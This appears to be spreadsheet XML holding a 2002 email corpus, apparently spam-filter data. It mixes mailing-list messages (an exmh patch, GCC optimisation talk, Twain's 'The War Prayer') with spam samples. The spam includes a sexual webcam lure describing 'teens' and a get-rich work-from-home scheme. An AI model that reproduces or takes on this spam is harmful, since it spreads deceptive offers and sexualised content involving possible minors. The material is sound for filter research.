 		&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;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zzz-unspun@example.com &lt;br&gt;&lt;a href="http://www.imakenews.com/eletra/remove.cfm?x=mediaunspun%2Czzz-unspun@example.com"&gt;Click here&lt;/a&gt; to be instantly removed from this list.&lt;br&gt;&lt;a href="http://www.imakenews.com/eletra/change.cfm?x=mediaunspun%2Czzz-unspun@example.com%2Ctxt"&gt;Click here&lt;/a&gt; to receive future messages in plain text format.&lt;br&gt;&lt;/font&gt;&lt;font face="verdana,arial" size="1"&gt;&lt;a
 href="http://www.imakenews.com/eletra/update.cfm?x=mediaunspun%2Czzz-unspun@example.com"&gt;Click here&lt;/a&gt; to change your subscriber information and preferences.&lt;br&gt;&lt;/font&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;!--Ver. 7--&gt;
 		&lt;p&gt;&amp;nbsp;
        &lt;img src="http://machina.imakenews.com/E177528,5114587XXmediaunspunXX18904XXXXindex000018904.cfmXXemailXX5114587XXXX0Y0XX1" alt="" height="0" width="0"&gt;		 
 		&lt;/p&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------------=_1029244856-11739-4--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Iraq invasion a 'hair-trigger' away
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/215,0,215/
 Date: 2002-10-03T04:21:07+01:00
 Washington has revealed its intention to use UN weapons inspections as a 
 possible first step towards a military occupation of Iraq.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Patch to complete a change...
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multipart MIME message.
 --==_Exmh_16073047980
 Content-Type: text/plain; charset=us-ascii
 I suspect that as part of Chris' set of changes, he cleaned up the
 use of the variable that was named "L" in FtocCommit (in ftoc.tcl).
 Its name got changed from L to lineno
 But there's one reference of $L left.   That causes tracebacks if
 you attempt to use "link" with the current CVS version of exmh.
 I guess that most of us don't use "link" very often ... I noticed it
 last week, but only got time to look and see why today.
 If someone with the ability to commit to the CVS repository would
 apply the following patch (to lib/ftoc.tcl) that would be nice.
 (It works... and is trivial, and you could perhaps just apply it by
 making the change with an editor faster than saving this patch and
 applying it - there's only one instance of $L in the file, that
 should be changed to $lineno)
 kre
 --==_Exmh_16073047980
 Content-Type: text/plain ; name="patch"; charset=us-ascii
 Content-Description: patch
 Content-Disposition: attachment; filename="PATCH"
 --- ftoc.tcl.PREV	Wed Aug 21 15:01:48 2002
 +++ ftoc.tcl	Tue Sep 10 12:47:06 2002
 @@ -1131,9 +1131,9 @@
  		}
  	    }
  	    incr ftoc(numMsgs) -1
  	} else {
 -	    FtocUnmarkInner $L
 +	    FtocUnmarkInner $lineno
  	}
  	incr ftoc(changed) -1
      }
      if {$delmsgs != {}} {
 --==_Exmh_16073047980--
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: "Cram school" operator arrested for trying to cram it into a 13
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8417753,1717/
 Date: 2002-10-01T03:29:21+01:00
 [IMG: http://www.newsisfree.com/Images/fark/mdn.gif ([MDN])]
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm sure Patton used it.
 I'm all for using it in the coming war with Iraq.
 Yet I'd be queasy about doing it in the Philippines circa 1905, which
 was his point.
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of R.
 A.
 &gt; Hettinga
 &gt; Sent: Monday, September 16, 2002 9:44 PM
 &gt; To: Digital Bearer Settlement List; fork@example.com
 &gt; Subject: &lt;nettime&gt; The War Prayer
 &gt; 
 &gt; 
 &gt; --- begin forwarded text
 &gt; 
 &gt; 
 &gt; Status: RO
 &gt; Date: Mon, 16 Sep 2002 14:57:27 -0700
 &gt; To: nettime-l@bbs.thing.net
 &gt; From: Phil Duncan &lt;PDuncan@AggregateStudio.com&gt;
 &gt; Subject: &lt;nettime&gt; The War Prayer
 &gt; Sender: nettime-l-request@bbs.thing.net
 &gt; Reply-To: Phil Duncan &lt;PDuncan@AggregateStudio.com&gt;
 &gt; 
 &gt; The following prayer is from a story by Mark Twain, and was quoted by
 &gt; Lewis
 &gt; Laphan in the October issue of Harper's magazine. It occurs at the
 very
 &gt; end
 &gt; of an excellent article which I recommend to you.
 &gt; 
 &gt; In the story, an old man enters a church where the congregation has
 been
 &gt; listening to an heroic sermon about "the glory to be won in battle by
 &gt; young
 &gt; patriots armed with the love of God." He usurps the pulpit and prays
 the
 &gt; following:
 &gt; 
 &gt; "O Lord our God, help us to tear their soldiers to bloody shreads with
 our
 &gt; shells; help us to cover their smiling fields with the pale forms of
 their
 &gt; patriot dead; help us to drown the thunder of the guns with the
 shrieks of
 &gt; their wounded, writhing in pain; help us to lay waste their humble
 homes
 &gt; with
 &gt; a hurricane of fire; help us to wring the hearts of their unoffending
 &gt; widows
 &gt; with unavailing grief; help us to turn them out roofless with their
 little
 &gt; children to wander unfriended the wastes of their desolated land in
 rags
 &gt; and
 &gt; hunger and thirst, sports of the sun flames in summer and the icy
 winds of
 &gt; winter, broken in spirit, worn with travail, imploring Thee for the
 refuge
 &gt; of
 &gt; the grave and denied it -- for our sakes who adore Thee, Lord, blast
 their
 &gt; hopes, blight their lives, protract their bitter pilgrimage, make
 heavy
 &gt; their
 &gt; steps, water their way with their tears, stain the white snow with the
 &gt; blood
 &gt; of their wounded feet! We ask it, in the spirit of love, of Him Who is
 the
 &gt; Source of Love, and Who is the ever-faithful refuge and friend of all
 that
 &gt; are sore beset and seek His aid with humble and contrite hearts.
 Amen."
 &gt; 
 &gt; Twain wrote the story, "The War Prayer," in 1905 during the American
 &gt; occupation of the Philippines, but the story wasn't printed until
 1923,
 &gt; thirteen years after his death, because the editors thought it
 &gt; "unsuitable"
 &gt; for publication at the time it was written.
 &gt; 
 &gt; #  distributed via &lt;nettime&gt;: no commercial use without permission
 &gt; #  &lt;nettime&gt; is a moderated mailing list for net criticism,
 &gt; #  collaborative text filtering and cultural politics of the nets
 &gt; #  more info: majordomo@bbs.thing.net and "info nettime-l" in the msg
 body
 &gt; #  archive: http://www.nettime.org contact: nettime@bbs.thing.net
 &gt; 
 &gt; --- end forwarded text
 &gt; 
 &gt; 
 &gt; --
 &gt; -----------------
 &gt; R. A. Hettinga &lt;mailto: rah@ibuc.com&gt;
 &gt; The Internet Bearer Underwriting Corporation &lt;http://www.ibuc.com/&gt;
 &gt; 44 Farquhar Street, Boston, MA 02131 USA
 &gt; "... however it may deserve respect for its usefulness and antiquity,
 &gt; [predicting the end of the world] has not been found agreeable to
 &gt; experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
</t>
  </si>
  <si>
    <t xml:space="preserve">"Groove really has people running scared"
 ....oh shit here comes that Groove thingy, run for your life ;-)
 ----- Original Message -----
 From: "Mr. FoRK" &lt;fork_list@hotmail.com&gt;
 To: &lt;fork@spamassassin.taint.org&gt;
 Sent: Friday, October 04, 2002 8:12 PM
 Subject: Documentum Acquires E-Room, Melding Content, Collaboration
 &gt;
 &gt; Don't know much about eRoom - but there is the magic phrase 'collaborate
 in
 &gt; real-time'... Groove really has people running scared. Wonder if any users
 &gt; actually /benefit/ from collaborating in real-time.
 &gt;
 &gt;
 &gt; ===
 &gt; http://www.internetwk.com/breakingNews/INW20021004S0001
 &gt;
 &gt; Content-management vendor Documentum said late Thursday it plans to
 acquire
 &gt; privately held e-Room Technologies in a deal worth about $100 million.
 &gt;
 &gt; Documentum will issue approximately 7.7 million shares of its common stock
 &gt; and pay about $12.6 million in cash for all of the outstanding shares of
 &gt; eRoom.
 &gt;
 &gt; Documentum makes a platform for enterprise-wide content management. ERoom
 &gt; makes tools for enterprise collaboration. Its customers include Airbus,
 &gt; Bausch &amp; Lomb, Ford Motor Co., and Sony.
 &gt;
 &gt; Documentum announced plans this summer to deliver a new Collaboration
 &gt; Edition of its content-management suite. ERoom was already integrating its
 &gt; tools to the Documentum platform, making an acquisition an easy target,
 &gt; according to Documentum president and CEO Dave DeWalt.
 &gt;
 &gt; With the upcoming joint product, customers will be able to collaborate in
 &gt; real-time via virtual workspaces, sharing schedules, resources, and even
 &gt; jointly creating content.
 &gt;
 &gt; Content creation and management has always been a collaborative task, but
 &gt; workflow has usually been delivered via a Web browser interface or even
 &gt; simple e-mail -- and rarely in real-time.
 &gt;
 &gt; For now, Documentum will sell the eRoom platform and its own
 &gt; content-management system through combined sales channels. Further
 &gt; integration is planned down the line, the companies said.
 &gt;
 &gt;
 &gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat 27 Jul 2002 01:57, you wrote:
 &gt; On Fri, Jul 26, 2002 at 11:24:30PM +0100, John Gay wrote:
 &gt; &gt; A while ago I asked what other packages I should optomize for Pentium.
 &gt; &gt; One person answered GlibC. This got me thinking about GCC itself, so I
 &gt; &gt; asked on another list and got a few answers, most were "don't even think
 &gt; &gt; about it" but a few suggested GCC and one pointed me to Linux From
 &gt; &gt; Scratch.
 &gt;
 &gt; why?
 &gt;
 &gt; or more specifically, what do you mean?  on one hand you can optimise
 &gt; how gcc is compiled.  all that will do is make it generate the exact
 &gt; same code just a smidge faster.  and since gcc is such a memory pig,
 &gt; you'd do better to buy more ram to up your fs cache hits and to keep
 &gt; gcc's heap out of swap.
 &gt;
 To explain what I mean:
 According to the PGCC site, GCC by itself is not very good at taking 
 advantage of the pipelining features introduced with the Pentium family. The 
 PGCC patches are supposed to make GCC generate tighter code, but your point 
 about compiler bugs is well taken. This is why I am taking things slow and 
 looking into these things. As Isaid, the PGCC site does not seem to have been 
 updated in at least a year or more?!? I am also looking into GCC itself. Now 
 that the 3.1. series is out, it might be better than when the PGCC patches 
 were written. The bottom line is, Pentiums have better instruction sets than 
 the original 386 instructions that they still support. The Pentium also 
 started introducing pipelining so properly generated code can be upto 30% 
 faster than equivulent code that performs the same function! As for why 
 optimise GCC if it will only produce that same code only slightly faster? The 
 speed is based on a percentage of the total compile time. The first time I 
 compiled the qt libs, with only 16M and a LOT of swap, it took over 48 hours. 
 I've now got 128M in the box but at 200Mhz any increase, distributed over 
 such a long compile is still considerable.
 &gt; on the other side you can look into patches to gcc that affect it's
 &gt; code generation.  um, ok, but keep in mind that compiler errors suck.
 &gt; i can't express that enough.  compilers should just work.  perfectly.
 &gt; always.  doing anything that might affect that is, in my opinion, insane.
 &gt; they're hard to trace and you'd better have a deep knowledge of what's
 &gt; going on to either report bugs to the patch developers or to fix it
 &gt; yourself.  plus my understanding is that gcc would need major changes
 &gt; to get large speed boosts on x86 chips.
 &gt;
 My understanding, and I've followed the development of the Intel family since 
 the 8080, each generation since the 386 has introduced better and faster 
 instructions. I.E.:
 The 486 introduced I.E.E.E floating point instructions by incorporating an 
 FPU on board. The first few generations were flaky, so Intel disabled the 
 dodgy ones and sold then as 486SX, I.E. without the FPU. Later generations 
 were better, this is why you only find slow 486SX's ;-) Therefore 486's, with 
 working FPU's can calculate floats faster than 386's, but you must generate 
 the proper codes to take advantage of this.
 The Pentium's improved the FPU logic and introduced pipelining. The first 
 generations of Pentiums had faulty FPu logic programmed into them, the 
 Pentium Bug, but subsequent ones were fine. These added instructions are 
 faster again then the 486 equivulents. Also, the pipelining needs careful 
 instruction ordering to take full advantage of it's speed improvements, 
 again, something the compiler must know about to utilise to full effect. 
 According the the PGCC site GCC does this poorly, but that info seems to be 
 dated, GCC3.1.x might be better. This is one of the areas I am researching 
 closely to get an answer.
 MMX added the ability to perform matrix calculations on int's with single 
 instructions and using special DMA features within the Pentium to speed this 
 up. Two problems with this:
 1) int's are not very useful for most matrix calculations, floats would be 
 betters.
 2) this is not something that can be optimised well by a compiler. It need to 
 be identified and provided for in the sources.
 I.E. not much use to anyone, but makes great ad copy ;-)
 The PentiumPro improved the pipeline enormously. Again, a properly written 
 compiler should be able to optimise for this, once it can organise the code 
 properly.
 The PIII added MMX-type instructions for floats! Now this IS useful! 
 Graphic-Intensive programs can take greate advantage of this, but it must be 
 provided for in the source code. Compilers can not, usually optimise for this 
 sort of thing. XFree86 and DRI are two prime examples that do provide for 
 this, so the PIII can run XFree86 and DRI quite a bit faster, IF it's 
 compiled for these SSE instructions!
 Not sure what improvements the P4 introduce? I think it's mostly just speed 
 improvements rather than any execution changes.
 So, The difference between the 386 and the PentiumMMX 'should' yield a 
 significant speed boost if optimised correctly. There are faster floating 
 point instructions and pipelining that need optimising for. I'm not sure if 
 GCC can optimise properly for the pipelining, at least the PGCC group found 
 significant improvements to add to GCC2.95.3 to gain speed improvements of 
 upto 30%. 30% of 48 hours is 14.4 hours. Of course none of this will have any 
 effect on O/I bound processes but GUI's are mostly CPU bound. I am also 
 finding out about object pre-linking optimisations which should give even 
 better performance for QT and KDE.
 Now if I had another PIII for my box, I could take advantage of those SSE 
 instructions to optimise XFree86 as well!
 &gt; kevin
 An, of course, I've loads of time on my hands now and I need something to 
 keep me busy. At least I can say that I've sucessfully built a full Linux 
 system, including KDE3 from scratch when I'm done ;-)
 Cheers,
 	John Gay
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: link to my webcam you wanted 
</t>
  </si>
  <si>
    <t xml:space="preserve">Wanna see sexually curious teens playing with each other?
 http://www.site-personals.com &lt;-- click here=)
 me and my horny girlfriends are waiting for you... we are probably eating each other out on webcam in our dormitory as ur reading this! (inbetween classes of course *wink*)
 see you soon baby,
 -Veronica
 mcmfkhcpedgetqj
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: M o n e y   J u d g e m e n t s            NNROYKI
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;FONT  COLOR=3D"#ff0000" BACK=3D"#ffff00" style=3D"BACKGROUND-COLOR: =
 #ffff00" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"=
 0"&gt;&lt;B&gt;Become your own Boss&lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT  COLOR=3D"#0000ff" BACK=3D"#=
 ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D=
 "SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT  COLOR=3D"#0000ff" BACK=3D"#00ffff" style=3D"BACKGROUND-COLOR=
 : #00ffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D=
 "0"&gt;Earn high income as a:&lt;/FONT&gt;&lt;FONT  COLOR=3D"#0000ff" BACK=3D"#ffffff"=
  style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSE=
 RIF" FACE=3D"Arial" LANG=3D"0"&gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT  COLOR=3D"#0000ff" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR=
 : #ffffff" SIZE=3D4 PTSIZE=3D14 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D=
 "0"&gt;*&amp;nbsp; &lt;/FONT&gt;&lt;FONT  COLOR=3D"#ff0000" BACK=3D"#ffff00" style=3D"BACK=
 GROUND-COLOR: #ffff00" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"A=
 rial" LANG=3D"0"&gt;Professional Judicial Judgment Processor&lt;BR&gt;
 &lt;BR&gt;
 &lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT  COLOR=3D"#0000ff" BACK=3D"#ffffff" style=3D"BACKGROUN=
 D-COLOR: #ffffff" SIZE=3D4 PTSIZE=3D14 FAMILY=3D"SANSSERIF" FACE=3D"Arial"=
  LANG=3D"0"&gt;*&amp;nbsp; &lt;/FONT&gt;&lt;FONT  COLOR=3D"#ff0000" BACK=3D"#ffff00" style=
 =3D"BACKGROUND-COLOR: #ffff00" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" F=
 ACE=3D"Arial" LANG=3D"0"&gt;Child Support Processor&lt;BR&gt;
 &lt;BR&gt;
 &lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT  COLOR=3D"#0000ff" BACK=3D"#ffffff" style=3D"BACKGROUN=
 D-COLOR: #ffffff" SIZE=3D4 PTSIZE=3D14 FAMILY=3D"SANSSERIF" FACE=3D"Arial"=
  LANG=3D"0"&gt;*&amp;nbsp; &lt;/FONT&gt;&lt;FONT  COLOR=3D"#ff0000" BACK=3D"#ffff00" style=
 =3D"BACKGROUND-COLOR: #ffff00" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" F=
 ACE=3D"Arial" LANG=3D"0"&gt;Pre-Employment Screening Expert&lt;BR&gt;
 &lt;BR&gt;
 &lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT  COLOR=3D"#0000ff" BACK=3D"#ffffff" style=3D"BACKGROUN=
 D-COLOR: #ffffff" SIZE=3D4 PTSIZE=3D14 FAMILY=3D"SANSSERIF" FACE=3D"Arial"=
  LANG=3D"0"&gt;*&amp;nbsp; &lt;/FONT&gt;&lt;FONT  COLOR=3D"#ff0000" BACK=3D"#ffff00" style=
 =3D"BACKGROUND-COLOR: #ffff00" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" F=
 ACE=3D"Arial" LANG=3D"0"&gt;Business Debt Arbitrator&lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT  COLO=
 R=3D"#0000ff" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D=
 3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;&lt;BR&gt;
 &lt;BR&gt;
 Work from your own home or office, anywhere in the US and Canada.&lt;BR&gt;
 &lt;BR&gt;
 Establish your own hours.&lt;BR&gt;
 &lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT  COLOR=3D"#ff0000" BACK=3D"#ffff00" style=3D"BACKGROUND-COLOR=
 : #ffff00" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D=
 "0"&gt;Come join our existing associates in making $5000 per month part time =
 and over $15,000 per month full time.&lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT  COLOR=3D"#0000ff=
 " BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 PTSIZE=3D1=
 2 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;&lt;BR&gt;
 &lt;BR&gt;
 Low start up costs.&lt;BR&gt;
 &lt;BR&gt;
 In-depth training and support&lt;BR&gt;
 &lt;BR&gt;
 To learn more visit us at:&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;A HR=
 EF=3D"http://freesite006.friendly-hosting.com/"&gt;Introducing The Cambridge =
 Family of Business Success Courses&lt;/A&gt; &lt;/FONT&gt;&lt;FONT  COLOR=3D"#0000ff" BAC=
 K=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 PTSIZE=3D12 FAM=
 ILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT  COLOR=3D"#ff0000" BACK=3D"#ffff00" style=3D"BACKGROUND-COLOR=
 : #ffff00" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D=
 "0"&gt;Or call us at: 1-281-500-4018&lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT  COLOR=3D"#0000ff" BA=
 CK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 PTSIZE=3D12 FA=
 MILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; (Customer =
 support staff are available to help you from &lt;/FONT&gt;&lt;FONT  COLOR=3D"#0000f=
 f" BACK=3D"#ffff00" style=3D"BACKGROUND-COLOR: #ffff00" SIZE=3D3 PTSIZE=3D=
 12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;7:00AM to 9:00PM, 7 days=
  a week Central time.&amp;nbsp; &lt;/FONT&gt;&lt;FONT  COLOR=3D"#0000ff" BACK=3D"#fffff=
 f" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANS=
 SERIF" FACE=3D"Arial" LANG=3D"0"&gt;&lt;BR&gt;
 &lt;BR&gt;
 No obligation or pressure. They will answer your questions and let&amp;nbsp; y=
 ou make your own informed decision on whether you want to join us or not.&lt;=
 BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT  COLOR=3D"#000000" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR=
 : #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D=
 "0"&gt;This ad is produced and communicated by:&lt;BR&gt;
 UAS, To be excluded from our ads email us at &lt;BR&gt;
 mp3@alarmists.com or write us at:&lt;BR&gt;
 UAS , P O B 1 2 0 0, O r a n g e s t a d, A r u b a&lt;/FONT&gt;&lt;FONT  COLOR=3D"=
 #0000ff" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 PTS=
 IZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;&lt;BR&gt;
 &lt;BR&gt;TO48 6-8 C3 P
 &lt;BR&gt;
 &lt;BR&gt;{%RAND%}
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;/3/
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;&lt;/font&gt;
 &lt;BR&gt;&lt;center&gt;
 &lt;BR&gt;&lt;font color=3Dmaroon&gt;)(*-*-*-*-*-*-*-*-*-R E M I N D E R-*-*-*-*-*-*-*=
 -*-*-*)(&lt;/font&gt;
 &lt;BR&gt;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 &lt;BR&gt;Incredible Opportunity / Fire Your Boss! / Work from home
 &lt;BR&gt;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 &lt;BR&gt;This Is Real, MAKE MONEY
 &lt;BR&gt;=3D*=3D*=3D*=3D*=3D*=3D*=3D*=3D*=3D*=3D*=3D*=3D*=3D*=3D*=3D*=3D*=3D*=3D=
 *=3D*=3D*=3D*=3D*=3D*=3D*=3D*=3D*=3D
 &lt;BR&gt;&lt;marquee&gt;3 =3D =3D  Judicial Judgment  =3D =3D 3&lt;/marquee&gt;
 &lt;BR&gt;
 &lt;BR&gt;three million is that enough for you? will give you more....&lt;/center&gt;
 &lt;/b&gt;&lt;/FONT&gt;&lt;/HTML&gt;
 &lt;BR&gt;
 &lt;BR&gt;/3/
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;Just visit the site and learn the advantages . . ..-3-
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Place Your LTC Declines with Us
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_14AAA3_01C251CD.D3972A00
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  We'll help you find and fund LTC alternatives!	 	
  M&amp;O Marketing -- The Agent's Company	
  Place your LTC declines!	
 Alzheimer's. Heart attacks. Diabetes. Parkinson's.
 You can offer guaranteed issue disability benefits to these clients 
 with tax advantages and no underwriting!
 We'll help you find?and fund?long term care alternatives for your
 clients. 
 You can make an additional, up-front commission and a bonus
 along with the Long Term Care sales you're making!
 Ask us for the LTC Alternatives. We'll give you multiple carriers and
 options for your clients.
  800-862-9133
 ? or ? 
 Please fill out the form below for more information	 
 Name:	  	 	
 E-mail:	  	
 Phone:	  	
 City:	  	State:	  	
 For agent use only. 
 We don't want anyone to receive our mailings who does not wish to. This
 is professional communication sent to insurance professionals. To be
 removed from this mailing list, DO NOT REPLY to this message. Instead,
 go here: http://www.InsuranceIQ.com/optout
 &lt;http://www.InsuranceIQ.com/optout&gt; 
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt;  
 ------=_NextPart_000_14AAA3_01C251CD.D3972A00
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Place Your LTC Declines with Us&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#6699cc" text=3D"#000000"&gt;
 &lt;font face=3D"Arial, Helvetica, sans-serif"&gt;
 &lt;table width=3D"550" border=3D"1" cellspacing=3D"0" cellpadding=3D"0" =
 align=3D"center" bordercolor=3D"#000000"&gt;
   &lt;tr&gt;
     &lt;td&gt;
 			&lt;table width=3D"100%" cellpadding=3D"0" cellspacing=3D"0" =
 align=3D"center" bgcolor=3D"#FFFFFF"&gt;
         &lt;tr&gt;=20
           &lt;td&gt;=20
             &lt;table width=3D"100%" cellpadding=3D"0" cellspacing=3D"0" =
 border=3D"0" bgcolor=3D"#ffffff"&gt;
               &lt;tr&gt;=20
                 &lt;td&gt;&lt;img =
 src=3D"http://iiq.us/images/mando/ltc0710/20020717-101.gif" =
 width=3D"367" height=3D"156" alt=3D"We'll help you find and fund LTC =
 alternatives!"&gt;&lt;/td&gt;
                 &lt;td rowspan=3D"2"&gt;&lt;img =
 src=3D"http://iiq.us/images/mando/ltc0710/20020717-102.gif" =
 width=3D"183" height=3D"274"&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td&gt;&lt;img =
 src=3D"http://iiq.us/images/mando/ltc0710/20020717-103.gif" =
 width=3D"367" height=3D"118" alt=3D"M&amp;amp;O Marketing -- The Agent's =
 Company"&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td colspan=3D"2"&gt;&lt;img =
 src=3D"http://iiq.us/images/mando/ltc0710/20020717-104.gif" =
 width=3D"550" height=3D"49" alt=3D"Place your LTC declines!"&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td width=3D"100%" align=3D"center"&gt;=20
             &lt;p&gt;&lt;font size=3D"2"&gt;&lt;br&gt;
               &lt;b&gt;&lt;font color=3D"#FF0000" size=3D"3"&gt;Alzheimer's. Heart =
 attacks. Diabetes. Parkinson's.&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
               You can offer &lt;b&gt;guaranteed issue disability benefits =
 &lt;/b&gt;to these clients &lt;br&gt;
               with tax advantages and no underwriting!&lt;/font&gt;&lt;/p&gt;
             &lt;p&gt;&lt;font size=3D"2"&gt;&lt;b&gt;We'll help you find&amp;#151;and =
 fund&amp;#151;long term care alternatives for your clients.&lt;/b&gt; &lt;br&gt;
               You can make an additional, &lt;b&gt;up-front commission and a =
 bonus&lt;/b&gt;&lt;br&gt;
               along with the Long Term Care sales you're =
